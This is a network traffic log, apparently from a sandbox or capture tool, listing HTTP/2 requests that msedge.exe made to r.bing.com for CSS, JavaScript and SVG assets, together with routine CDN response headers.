88.221.135.41:443

Request

GET /rp/LIEHzv436maqEs91Bl64_t5z744.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:30:48 GMT
etag: 0x8DCE8C2C99992AA
content-length: 78811
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: QAj2e1Q/dl4ZlaM/+H2e5g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b7d872dd-401e-0070-0ebc-369954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=204309
expires: Fri, 06 Dec 2024 18:53:27 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/b25kETZR7SXl88llCSPQN8Uia1s.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/b25kETZR7SXl88llCSPQN8Uia1s.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:39:18 GMT
etag: 0x8DCDC639D63D2F4
content-length: 1413
content-type: image/svg+xml
content-md5: jzqW1LLM/wNoCZu1oyjoNg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 455e1cc5-d01e-0013-276a-16df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=281490
expires: Sat, 07 Dec 2024 16:19:48 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26db
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2PHa2yDQOlYOXYRrjcHGGR2k5NA.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/2PHa2yDQOlYOXYRrjcHGGR2k5NA.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:33:35 GMT
etag: 0x8DCEC871833880E
content-length: 1410
content-type: image/svg+xml
content-md5: A1TRayhJ3yl1GOR1TB8Jpg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ad0c0639-701e-0078-0479-228227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=261282
expires: Sat, 07 Dec 2024 10:43:00 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26da
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/anVkO2HlnUQC6DFZn_GFhiYJwWQ.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/anVkO2HlnUQC6DFZn_GFhiYJwWQ.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:29:17 GMT
etag: 0x8DCE8C29360DB11
content-length: 13602
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: t9TatafuNsJXT1+KjK4r0w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4adf2978-701e-0051-20bc-36f465000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a9777b5c.1731633222.1384f8e4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=177657
expires: Fri, 06 Dec 2024 11:29:15 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d7
timing-allow-origin: *
GET

https://r.bing.com/rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:53:13 GMT
etag: 0x8DCDC5D2D7EB1BF
content-length: 320
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: DXeqkh2i/zZTwJ5wkgDOdw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 78ea86ea-501e-006f-4cf7-174244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=170687
expires: Fri, 06 Dec 2024 09:33:47 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe7ff
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:14:00 GMT
etag: 0x8DCDC6014B09FF0
content-length: 542
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Jc7Bnfc4/wV22XT5OjPjLg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 96271d35-101e-002c-405a-1768ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=166001
expires: Fri, 06 Dec 2024 08:15:41 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe802
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:31:17 GMT
etag: 0x8DCDC627F380DA7
content-type: text/javascript; charset=utf-8
content-md5: 1Rf0xX8VNREaPigiNASk/Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e6aac681-201e-0042-1314-16c184000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 632
cache-control: public, no-transform, max-age=62858
expires: Thu, 05 Dec 2024 03:36:38 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe806
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/s_KB_GYETp6JptI_mOoLcYDN4OY.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/s_KB_GYETp6JptI_mOoLcYDN4OY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:12 GMT
etag: 0x8DCE8C26CBEA77D
content-length: 1934
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: NwHEJrwNKfNaWOfUurgsUQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 44d1d951-101e-002c-01de-1a68ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731627879.1ae70d09
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=145898
expires: Fri, 06 Dec 2024 02:40:38 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe809
timing-allow-origin: *
GET

https://r.bing.com/rp/BFQDsdSF9E9Gp0u-xRbmGVfJfe0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/BFQDsdSF9E9Gp0u-xRbmGVfJfe0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:30:47 GMT
etag: 0x8DCE8C2C92E361F
content-length: 1979
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oCgEakDIKvDIYdA4zfrHhQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2670e517-b01e-006e-0df3-3243b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b6901002.1731335752.14eb9c7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=33671
expires: Wed, 04 Dec 2024 19:30:11 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80a
timing-allow-origin: *
GET

https://r.bing.com/rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:54 GMT
etag: 0x8DCDC5CFE789590
content-length: 1462
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YsxphTS643oFtIWrwjg5mA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6a9070a5-501e-0020-2ef1-17865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=125339
expires: Thu, 05 Dec 2024 20:57:59 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/nc-eSocRvb1YGk0LjP4DtvgRRsw.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/nc-eSocRvb1YGk0LjP4DtvgRRsw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:14:44 GMT
etag: 0x8DCDC602EF80ACF
content-length: 92
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6CIgOkytlGCbuuRvU1ESHg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b826b2dc-201e-0024-251c-1573de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=354366
expires: Sun, 08 Dec 2024 12:35:06 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/5jOFZTRZRQNYEniUpjuVlRlTSUA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/5jOFZTRZRQNYEniUpjuVlRlTSUA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:27:10 GMT
etag: 0x8DCE8C247F92C3E
content-length: 2859
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hOJRe/y21ezUnMJkb3Rnrw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b5930caa-e01e-0054-0cde-1a001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.95777b5c.1731632067.a92d91a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=161184
expires: Fri, 06 Dec 2024 06:55:24 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80e
timing-allow-origin: *
GET

https://r.bing.com/rp/8BLbyUK5EaqCuzmCEcf9-meevmE.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/8BLbyUK5EaqCuzmCEcf9-meevmE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:34:24 GMT
etag: 0x8DCE8C34A2EADC0
content-type: text/javascript; charset=utf-8
content-md5: UYaER6ThZGEud/Muajg45w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5d7ec60e-101e-000e-50d0-1e069b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2303
vary: Accept-Encoding
akamai-grn: 0.521a1202.1731419023.37910172
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=90866
expires: Thu, 05 Dec 2024 11:23:26 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80f
timing-allow-origin: *
GET

https://r.bing.com/rp/YOfvioAlqeLJzUxJ3VRDJvFPi5Q.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/YOfvioAlqeLJzUxJ3VRDJvFPi5Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:03 GMT
etag: 0x8DCDC5CDFF72AD3
content-length: 512
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: V1kiVXzIRqmzPm5TrNimoA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c2d94308-501e-006f-4b98-164244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=81101
expires: Thu, 05 Dec 2024 08:40:41 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe811
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/7LkHIwasTuL6tufzeF3vEaazAxw.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/7LkHIwasTuL6tufzeF3vEaazAxw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:19 GMT
etag: 0x8DCE8C2FFE31093
content-length: 2006
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: h74d7kzmL5ogfEui+8PbEg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fa7c77d1-701e-0051-1cdf-1af465000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.256d1002.1728543050.26299500
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=196474
expires: Fri, 06 Dec 2024 16:43:34 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe807
timing-allow-origin: *
GET

https://r.bing.com/rp/MCwdqGFTwqu20jt3177s57V4wZk.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/MCwdqGFTwqu20jt3177s57V4wZk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:29:00 GMT
etag: 0x8DCEC867483C0F6
content-length: 11443
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: KAOFsYWnScQ+zqFZAuiCaQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 310f4e45-e01e-0039-3e0a-1faa34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.95777b5c.1731584124.5f35dd6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=323622
expires: Sun, 08 Dec 2024 04:02:42 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe810
timing-allow-origin: *
GET

https://r.bing.com/rp/dDiRViGCXHkOBl6zHkdBDLk0yFg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/dDiRViGCXHkOBl6zHkdBDLk0yFg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 19 Nov 2024 04:13:15 GMT
etag: 0x8DD08507D665276
content-length: 955
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Kk0u9e/SalHwM0LSYxaS+g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a67788bb-101e-0063-1eab-3aacb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1732053803.7ae27a55
